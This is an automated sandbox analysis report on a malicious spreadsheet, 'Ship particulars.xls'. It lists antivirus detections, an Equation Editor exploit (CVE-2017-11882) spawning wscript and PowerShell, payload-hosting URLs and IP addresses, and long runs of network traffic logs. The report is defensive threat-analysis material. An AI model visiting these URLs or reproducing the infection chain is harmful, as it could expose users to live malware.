Windows Analysis Report
Ship particulars.xls

AV Detection

Source: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?17198462358ZK;	Avira URL Cloud: Label: malware
Source: http://91.92.254.29/Users_API/syscore/file_ygeik543.xh0.txt	Avira URL Cloud: Label: malware
Source: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235p	Avira URL Cloud: Label: malware
Source: https://uploaddeimagens.com.br/images/004/807/053/original/new_image.jpg?1719846235	Avira URL Cloud: Label: malware

Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\uh.uh.uhuhuh.uu.uh[1].doc	Avira: detection malicious, Label: HEUR/Rtf.Malformed
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRF{45674ED6-0137-4508-99E9-56BDBC83CE0D}.tmp	Avira: detection malicious, Label: EXP/CVE-2017-11882.Gen
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\4924813.doc	Avira: detection malicious, Label: HEUR/Rtf.Malformed

Source: Ship particulars.xls

ReversingLabs: Detection: 21%

Source: Ship particulars.xls

Joe Sandbox ML: detected

Exploits

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Network connect: IP: 198.46.178.139 Port: 80

Jump to behavior

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE

Process created: C:\Windows\SysWOW64\wscript.exe

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE "C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding

Compliance

Source: unknown

HTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.22:49174 version: TLS 1.0

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll

Jump to behavior

Software Vulnerabilities

Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE

Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 9_2_035B05CF ShellExecuteW,ExitProcess,		9_2_035B05CF
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 9_2_035B05F4 ExitProcess,		9_2_035B05F4
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 9_2_035B04E8 LoadLibraryW,		9_2_035B04E8
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 9_2_035B05A1 URLDownloadToFileW,ShellExecuteW,ExitProcess,		9_2_035B05A1
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE	Code function: 9_2_035B05BA ShellExecuteW,ExitProcess,		9_2_035B05BA

Source: C:\Windows\SysWOW64\wscript.exe

Child: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

Source: global traffic	DNS query: name: hop.fyi
Source: global traffic	DNS query: name: hop.fyi
Source: global traffic	DNS query: name: hop.fyi
Source: global traffic	DNS query: name: hop.fyi
Source: global traffic	DNS query: name: hop.fyi
Source: global traffic	DNS query: name: hop.fyi
Source: global traffic	DNS query: name: hop.fyi
Source: global traffic	DNS query: name: hop.fyi
Source: global traffic	DNS query: name: uploaddeimagens.com.br
Source: global traffic	DNS query: name: hop.fyi
Source: global traffic	DNS query: name: hop.fyi
Source: global traffic	DNS query: name: hop.fyi
Source: global traffic	DNS query: name: hop.fyi

Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49172 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49173 -> 91.92.254.29:80
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443
Source: global traffic	TCP traffic: 192.168.2.22:49174 -> 188.114.96.3:443

Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49163
Source: global traffic	TCP traffic: 192.168.2.22:49163 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49164
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49164 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49165
Source: global traffic	TCP traffic: 192.168.2.22:49165 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.185.89.92:80
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.185.89.92:80 -> 192.168.2.22:49166
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 192.168.2.22:49167 -> 198.46.178.139:80
Source: global traffic	TCP traffic: 198.46.178.139:80 -> 192.168.2.22:49167
Source: global traffic	TCP traffic: 192.168.2.22:49166 -> 192.185.89.92:80
